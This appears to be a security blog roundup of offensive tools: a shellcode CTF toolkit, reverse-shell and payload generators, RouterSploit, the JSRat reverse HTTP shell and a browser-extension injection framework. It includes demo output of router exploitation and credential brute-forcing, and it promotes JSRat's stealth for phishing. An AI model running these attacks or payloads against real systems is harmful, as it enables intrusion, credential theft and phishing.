
Saturday, April 30, 2016

Security CTF Toy Tools - v0lt

v0lt is an attempt to gather every tool I used, use, or will use in security CTFs, Python style. A lot of exercises were solved using bash scripts, but Python may be more flexible, which is the reason for this. It has nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Caesar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (dictionary, custom word)
  • Shellcodes
    • Shellcode selection and download from Shell-storm repo
    • Shellcode formatter
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
More examples are available here.

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree



Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers - GEF

GEF is aimed mostly at exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during dynamic analysis and exploit development.
GEF relies entirely on the GDB API and other Linux-specific sources of information (such as /proc/pid). As a consequence, some of the features might not work on custom or hardened systems such as GrSec. It fully supports Python 2 and Python 3 alike (as more and more distros start shipping gdb compiled with Python 3 support).

Quick start

Simply make sure you have GDB 7.x or later.

 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Then just start playing (for local files):

$ gdb -q /path/to/my/bin
gef> gef help

Or (for remote debugging)

remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 

And

local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

Screenshots of GEF running on x86, ARM, PowerPC and MIPS (images not reproduced here).

Dependencies

There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install Capstone, ROPgadget and radare2-python.
Note: if you are using GDB with Python 3 support, you cannot use ROPgadget, as its Python 3 support has not been implemented yet. Capstone and radare2-python will work just fine.
Another note: Capstone is packaged for Python 2 and 3 with pip. So a quick install is


$ pip2 install capstone    # for Python2.x
$ pip3 install capstone # for Python3.x

And same goes for ropgadget

$ pip[23] install ropgadget

The assemble command relies on the binary rasm2 provided by radare2 .



Script to collect information to the client side - GetDataReport

A script in PHP+JS to get information about a target through a web application; it uses $_SERVER variables and JS functions to collect information about the client.

Plugin (WEBApps)

Some web applications need to collect information from the client to perform tasks; with this plugin it will be easier to work with the variables you need.

<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

// Each accessor returns one attribute collected from the visiting client.
echo "<br>IP ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser ".$data->browser();
echo "<br>Screen height ".$data->height();
echo "<br>Screen width ".$data->width();
echo "<br>Java enabled ".$data->javaenabled();
echo "<br>Cookie enabled ".$data->cookieenabled();
echo "<br>Language ".$data->language();
echo "<br>Architecture ".$data->architecture();
echo "<br>Device ".$data->device();
echo "<br>Country ".$data->geo('country');
echo "<br>Region ".$data->geo('region');
echo "<br>Continent ".$data->geo('continent');
echo "<br>City ".$data->geo('city');
echo "<br>Longitude ".$data->geo('logitude'); // key name as used in the plugin's README
echo "<br>Latitude ".$data->geo('latitude');
echo "<br>Currency ".$data->geo('currency');
echo "<br>Provetor ".$data->provetor();
echo "<br>Agent ".$data->agent();
echo "<br>Referer ".$data->referer();
echo "<br>Date ".$data->getdate();

?>

Hack (Social engineering)

With this script we can collect information from a target by redirecting the visitor and generating an HTML page report.

        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com



An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...



Payload Variables


Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).


Available variables
  • LHOST : Local IP or name
  • LPORT : Local port
  • RHOST : Remote IP or name
  • RPORT : Remote port
  • USER : Username (only used in a few payloads)
  • PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.
  • Configuration variables can be viewed via the config command at any time, or by entering the variable name
  • Variables can be changed at any time by entering set <variable> <value>
  • You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
    • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros


In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.



Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).


Installation

Releases
Some features are unavailable in the compiled version, but it is a good way to quickly try out Brosec.

Manual installation

Mac
  • brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Kali Linux
  • apt-get install npm build-essential g++ xsel netcat - Install dependencies
  • npm config set registry http://registry.npmjs.org/ - The npm registry seems to be broken by default when installed from Kali repos
  • npm install -g n - Install n (nodejs version manager)
  • n latest - Install the latest version of nodejs
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Windows (Unsupported)
  • Install nodejs
  • Install ncat
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc


Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).



Friday, April 22, 2016

Payload generator that uses Metasploit and Veil - Payday

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads

payday.py --msf --ip 1.1.1.1

Generate Veil Payloads

payday.py --veil --ip 1.1.1.1

Generate Both

payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories

payday.py --clean

Specify custom output directory

payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory

payday --output /path/to/custom --clean



Router Exploitation Framework - RouterSploit

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check whether the target is vulnerable to any exploit

Installation


sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage


root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Router Exploitation Framework |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf >

1. Exploits

Pick the module


rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

You can use the Tab key for completion.

Options

Display module options:


rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


Name      Current settings    Description
----      ----------------    -----------
target                        Target address e.g. http://192.168.1.1
port      80                  Target Port

Set options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:


rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

It is also possible to check if the target is vulnerable to particular exploit:


rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:


rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located under the creds/ directory allow running dictionary attacks against various network services.
The following services are currently supported:
  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp
Every service has been divided into two modules:
  • default (e.g. ssh_default) - modules of this kind use one wordlist of default credential pairs in login:password form. The module can be run quickly and verifies in a matter of seconds whether the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - modules of this kind perform dictionary attacks against a specified account or list of accounts. They take two parameters, login and password. Each value can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
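The two module kinds differ only in how candidate pairs are built from their parameters. The following is an added illustration of that contract (not RouterSploit's own code): a parameter is either a literal word or a file:// wordlist, default modules try each login:password line as written, and bruteforce modules try the full cross product. The function names and the wordlist layout are my assumptions; nothing is contacted over the network.

```python
import os
import tempfile
from itertools import product

# Added illustration of the parameter contract described above; this is not
# routersploit's own code. Assumed: a creds parameter is either a literal word
# or a file:// URL naming a wordlist with one entry per line.
def resolve_param(value):
    """Expand a login/password parameter into its list of candidates."""
    if not value.startswith("file://"):
        return [value]
    path = value[len("file://"):]
    seen, out = set(), []
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            entry = line.rstrip("\r\n")
            # Skip blanks, '#' comments and repeats so the same guess is not retried.
            if not entry or entry.startswith("#") or entry in seen:
                continue
            seen.add(entry)
            out.append(entry)
    return out

def default_pairs(wordlist_text):
    """'default' modules: each wordlist line is one login:password pair tried as-is."""
    pairs = []
    for line in wordlist_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        login, password = line.split(":", 1)   # the password itself may contain ':'
        pairs.append((login, password))
    return pairs

def bruteforce_pairs(login_param, password_param):
    """'bruteforce' modules: every login candidate against every password candidate."""
    return list(product(resolve_param(login_param), resolve_param(password_param)))

def demo():
    """Run both modes over constructed sample wordlists (nothing is contacted)."""
    with tempfile.TemporaryDirectory() as tmp:
        users = os.path.join(tmp, "users.txt")
        passwords = os.path.join(tmp, "pass.txt")
        with open(users, "w", encoding="utf-8") as fh:
            fh.write("admin\nroot\n\nadmin\n")            # blank line and a duplicate
        with open(passwords, "w", encoding="utf-8") as fh:
            fh.write("# constructed sample\n1234\npassword\n")
        brute = bruteforce_pairs("file://" + users, "file://" + passwords)
    # Constructed defaults.txt content in the login:password layout.
    defaults = default_pairs("admin:1234\nroot:\nsupport:pa:ss\n# comment\n\n")
    return {"bruteforce": brute, "default": defaults,
            "literal": bruteforce_pairs("admin", "admin")}

if __name__ == "__main__":
    for mode, pairs in demo().items():
        print(mode, len(pairs), pairs)
```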
Console:

rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

Options


rsf (SSH Default Creds) > show options

Target options:

Name      Current settings    Description
----      ----------------    -----------
target                        Target IP address
port      22                  Target port


Module options:

Name      Current settings                                                  Description
----      ----------------                                                  -----------
threads   8                                                                 Numbers of threads
defaults  file:///root/git/routersploit/routersploit/wordlists/defaults.txt   User:Pass or file with default credentials (file://)

Set target:

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module


rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)


Elapsed time: 38.9181981087 seconds
[+] Credentials found!

Login Password
----- --------
admin 1234

rsf (SSH Default Creds) >

3. Scanners

Scanners allow you to quickly verify whether the target is vulnerable to any exploits.

Pick module


rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options


Target options:

Name      Current settings    Description
----      ----------------    -----------
target                        Target address e.g. http://192.168.1.1
port      80                  Target port

Set target:
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module


rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure

It has been verified that the target is vulnerable to the dwr_932_info_disclosure exploit. Now use the proper module and exploit the target.


rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

Parameter Value
--------- -----
get_wps_enable 0
wifi_AP1_enable 1
get_client_list 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0
wifi_AP1_ssid dlink-DWR-932
get_mac_address c4:00:f5:00:ec:40
wifi_AP1_security_mode 3208,8
wifi_AP1_hidden 0
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0




Reverse HTTP Shell Using JavaScript - JSRat

JSRat is a reverse HTTP shell written in JavaScript. JSRat uses rundll32.exe to load the JavaScript code from cmd, and an HTTP shell is returned when the code is executed. The special part is that after the cmd command runs, rundll32.exe remains in the background and continuously connects back to the server. No file is written to disk during the whole process, which significantly enhances stealth.

Characteristics:

Returns a reverse shell by using cmd to execute the code


Advantages:

  • It can avoid being killed
  • It’s easy to use
  • It’s relatively stealthy.

Exploitation:

Given these characteristics and advantages, using JavaScript as a phishing payload can be very effective.
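The telemetry side of the behaviour described above: a legitimate rundll32.exe invocation names a DLL, whereas JSRat hands it a script URI. The following is an added detection example (not part of the JSRat project) run over constructed process-creation events in a Sysmon-like layout; it also flags the vbscript: variant, which goes beyond the page. Field names and the placeholder command lines are my assumptions.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 style; not real
# telemetry. Only the last two are JSRat-like: rundll32 handed a script URI
# instead of a DLL, so the JavaScript runs without touching disk.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\CONSTRUCTED-PLACEHOLDER"'},
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Program Files\Example\app.exe",
     "CommandLine": r'RUNDLL32.EXE  JavaScript:"CONSTRUCTED-PLACEHOLDER"'},
]

# A legitimate rundll32 invocation names a DLL (optionally DLL,Export). A script
# scheme in its place is the JSRat behaviour; vbscript: is the sibling variant.
RUNDLL32_IMAGE = re.compile(r"(?i)(^|\\)rundll32\.exe$")
SCRIPT_SCHEME = re.compile(r"(?i)\b(javascript|vbscript):")

def is_rundll32_script_launch(event):
    return bool(RUNDLL32_IMAGE.search(event["Image"])
                and SCRIPT_SCHEME.search(event["CommandLine"]))

def classify(event):
    """Return None for benign events, otherwise a short finding for the analyst."""
    if not is_rundll32_script_launch(event):
        return None
    # A cmd.exe parent matches the delivery path described for JSRat.
    parent = event["ParentImage"].lower()
    severity = "high" if parent.endswith("\\cmd.exe") else "medium"
    return f"{severity}: rundll32 launched with script URI (parent {event['ParentImage']})"

def scan(events):
    """Return [(index, finding)] for every suspicious event in the batch."""
    hits = []
    for idx, event in enumerate(events):
        finding = classify(event)
        if finding:
            hits.append((idx, finding))
    return hits

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```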



Script for searching the extracted firmware file system for goodies! - Firmwalker

A simple bash script for searching the extracted or mounted firmware file system.

It will search through the extracted or mounted firmware file system for things of interest such as:
  • etc/shadow and etc/passwd
  • list out the etc/ssl directory
  • search for SSL related files such as .pem, .crt, etc.
  • search for configuration files
  • look for script files
  • search for other .bin files
  • look for keywords such as admin, password, remote, etc.
  • search for common web servers used on IoT devices
  • search for common binaries such as ssh, tftp, dropbear, etc.
  • search for URLs, email addresses and IP addresses
  • NOTE: Some of the data written to the file may be quite verbose. In that case, the data can be reviewed and then deleted from the file if desired.

Usage
  • If you wish to use the static code analysis portion of the script, please install eslint: npm i -g eslint
  • ./firmwalker {path to root file system} {path for firmwalker.txt}
  • Example: ./firmwalker linksys/fmk/rootfs ../firmwalker.txt
  • A file firmwalker.txt will be created in the same directory as the script file unless you specify a different filename as the second argument
  • Do not put the firmwalker.sh file inside the directory to be searched, this will cause the script to search itself and the file it is creating
  • chmod 0700 firmwalker.sh
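An added Python illustration of the kind of sweep listed above (the firmwalker script itself is bash and is not reproduced here): walk an extracted root file system, group files by name pattern, flag common service binaries, and grep file contents for keywords and URL/e-mail/IP strings. The category names, patterns and the tiny constructed rootfs are my assumptions.

```python
import os
import re
import tempfile

# Added illustration of the search the script performs; the categories follow
# the list above, but the patterns are assumptions of mine, not firmwalker's.
NAME_PATTERNS = {
    "credential-store": re.compile(r"(^|/)etc/(shadow|passwd)$"),
    "ssl-material":     re.compile(r"\.(pem|crt|cer|key|p12)$", re.I),
    "config":           re.compile(r"\.(conf|cfg|ini)$", re.I),
    "script":           re.compile(r"\.(sh|py|pl|lua)$", re.I),
    "binary-image":     re.compile(r"\.bin$", re.I),
}
SERVICE_BINARIES = {"ssh", "sshd", "dropbear", "tftp", "tftpd", "telnetd", "httpd", "lighttpd"}
KEYWORDS = re.compile(rb"admin|password|remote", re.I)
URL_EMAIL_IP = re.compile(rb"https?://[^\s'\"]+|[\w.+-]+@[\w-]+\.[\w.]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")

def walk_rootfs(root, max_bytes=1 << 20):
    """Return {category: sorted rootfs-relative paths} for the tree under root."""
    categories = list(NAME_PATTERNS) + ["service-binary", "keyword", "url-email-ip"]
    findings = {c: set() for c in categories}
    for dirpath, _, filenames in os.walk(root):       # symlinked dirs are not followed
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            for category, pattern in NAME_PATTERNS.items():
                if pattern.search(rel):
                    findings[category].add(rel)
            if name in SERVICE_BINARIES:
                findings["service-binary"].add(rel)
            if os.path.islink(full) or os.path.getsize(full) > max_bytes:
                continue   # do not chase links out of the image; skip large blobs
            with open(full, "rb") as fh:
                data = fh.read()
            if data.startswith(b"#!"):                 # extensionless init scripts
                findings["script"].add(rel)
            if KEYWORDS.search(data):
                findings["keyword"].add(rel)
            if URL_EMAIL_IP.search(data):
                findings["url-email-ip"].add(rel)
    return {c: sorted(paths) for c, paths in findings.items()}

def demo():
    """Build a tiny constructed rootfs in a temp dir and scan it."""
    files = {   # constructed contents, not from any real firmware
        "etc/shadow": b"root:$1$CONSTRUCTED$:0:0:99999:7:::\n",
        "etc/ssl/server.pem": b"-----BEGIN CERTIFICATE-----\nCONSTRUCTED\n-----END CERTIFICATE-----\n",
        "etc/init.d/rcS": b"#!/bin/sh\n/usr/sbin/httpd -p 80\n",
        "usr/sbin/dropbear": b"\x7fELF-CONSTRUCTED",
        "www/admin.cgi": b"<html>admin panel, contact support@example.com</html>\n",
        "var/log/empty.txt": b"",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return walk_rootfs(root)

if __name__ == "__main__":
    for category, paths in demo().items():
        print(f"{category:17} {paths}")
```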

How to extend

Script created by Craig Smith and expanded by:
  • Athanasios Kostopoulos
  • misterch0c

Links



Extension Exploitation Framework - LynxFramework

LynxFramework is an exploitation tool for web browsers offering a service specialised in browser extension development, namely for Google Chrome and soon Firefox. It works by injecting a script into the extension in order to retrieve targeted data.




LAST ONLINE PAYLOAD
  • XSSKeylooger - XSS keylogger
  • ForceDownload - force file download
  • paytoweb - www.paytoweb.com
  • Paypal - https://www.paypal.com/signin/
  • Facebook - http://facebook.com


Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community